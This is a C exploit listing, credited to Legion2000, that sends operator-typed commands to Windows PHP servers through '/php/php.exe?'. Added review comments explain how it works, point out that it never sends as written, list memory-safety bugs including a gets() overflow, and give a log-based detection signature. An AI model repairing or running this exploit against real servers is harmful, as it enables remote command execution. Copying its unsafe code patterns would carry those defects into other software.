/* concept.c By NTFX
 * Some code borrowed from an old iis exploit.
 *
 * Vulnerable systems:
 * PHP version 4.1.1 under Windows
 * PHP version 4.0.4 under Windows
 *
 * (c) Legion2000 Security Research , code may be distributed
 * credit is greatfully given if so..
 * Greets: opt1k, I-L, EazyMoney, SpyModem
 *
 * Does this work? you tell me.
 * http://www.legion2000.net http://www.spymodem.com
 */

/*
 * Review notes (defensive reading of the listing below).
 *
 * What the code does: it loops forever, reads one line from stdin,
 * rewrites every space as '+', resolves argv[1] as a host name, opens a
 * TCP socket to port 80 and, inside one guarded branch, builds the request
 * line "GET /php/php.exe?<line> HTTP/1.0" and prints whatever comes back.
 *
 * Detection: the only network artefact is that request line. On hosts
 * running the PHP versions listed in the header, access-log entries that
 * request /php/php.exe directly with a query string are the thing to look
 * for. The precondition visible here is that the interpreter binary is
 * reachable through a URL path.
 *
 * The listing has several memory-safety and logic defects, marked inline.
 * As published, the branch that sends the request is entered only when
 * socket() has failed.
 */

/*
 * NOTE(review): the eight header names below are missing from the page;
 * presumably the <...> operands were stripped as markup during extraction.
 * The directives are left as found.
 */
#include
#include
#include
#include
#include
#include
#include
#include

/*
 * Entry point.
 *
 * argv[1] is passed to gethostbyname(), so it is used as a host name even
 * though the usage text describes it as "/dir/file.executable".
 * The function never returns normally: it leaves through exit(0), either
 * from the usage branch or when an input line contains "exit".
 */
int main(int argc, char **argv){
    char buffer[1024];   /* outgoing request line */
    char buf[500];       /* one line of operator input */
    char rcvbuf[8192];   /* raw response bytes */
    int i, sock, result; /* result is assigned below but never read */
    struct sockaddr_in name;
    struct hostent *hostinfo;

    /* Usage banner; note the exit status is 0 even though nothing ran. */
    if (argc < 2){
        printf ("To use type %s /dir/file.executable\n", argv[0]);
        printf ("Author: NTFX NTX@SpyModem.Com\n");
        printf ("Legion2000 Security Research (c)");
        printf ("\n\n");
        exit(0);
    }

    for (;;) {
        printf ("to exit type erm.. exit!");
        printf ("\n\n");
        printf ("[enter@cmd /here]#");

        /*
         * Defect: gets() has no length limit, so any input line longer
         * than 499 characters overflows the 500-byte stack buffer.
         * gets() was removed from the language in C11.
         */
        gets(buf);

        /* Substring match: any line containing "exit" anywhere ends the program. */
        if (strstr(buf, "exit")) exit(0);

        /* Replace each ASCII space (32) with '+' (43) in place. */
        i=0;
        while (buf[i] != '\0'){
            if(buf[i] == 32) buf[i] = 43;
            i++;
        }

        /*
         * Defect: the gethostbyname() result is dereferenced two lines
         * below without a NULL check, so a failed lookup crashes here.
         * The lookup is also repeated on every loop iteration.
         */
        hostinfo=gethostbyname(argv[1]);
        name.sin_family=AF_INET;
        name.sin_port=htons(80);
        name.sin_addr=*(struct in_addr *)hostinfo->h_addr;

        sock=socket(AF_INET, SOCK_STREAM, 0);
        /* Defect: the connect() result is stored but never checked. */
        result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));

        /*
         * As written, this branch runs only when socket() returned an
         * error (sock < 0). When the socket is valid the branch is skipped
         * and, because close() sits inside it, the descriptor is leaked on
         * every iteration.
         */
        if (sock < 0){
            /*
             * 17 bytes of prefix + at most 499 of input + 11 of suffix
             * fit in buffer[1024], provided buf was not already
             * overflowed by gets() above.
             */
            strcpy(buffer,"GET /php/php.exe?");
            strcat(buffer,buf);
            strcat(buffer, " HTTP/1.0\n\n");

            /*
             * Defect: sizeof(buffer) transmits all 1024 bytes, including
             * the uninitialised stack contents after the terminator.
             */
            send(sock, buffer, sizeof(buffer), 0);

            /*
             * Defect: the recv() return value is ignored and rcvbuf is
             * never NUL-terminated, so the "%s" below can read past the
             * received data and past the end of the array.
             */
            recv(sock, rcvbuf, sizeof(rcvbuf), 0);
            printf ("%s", rcvbuf);
            close(sock);
        }
    };
};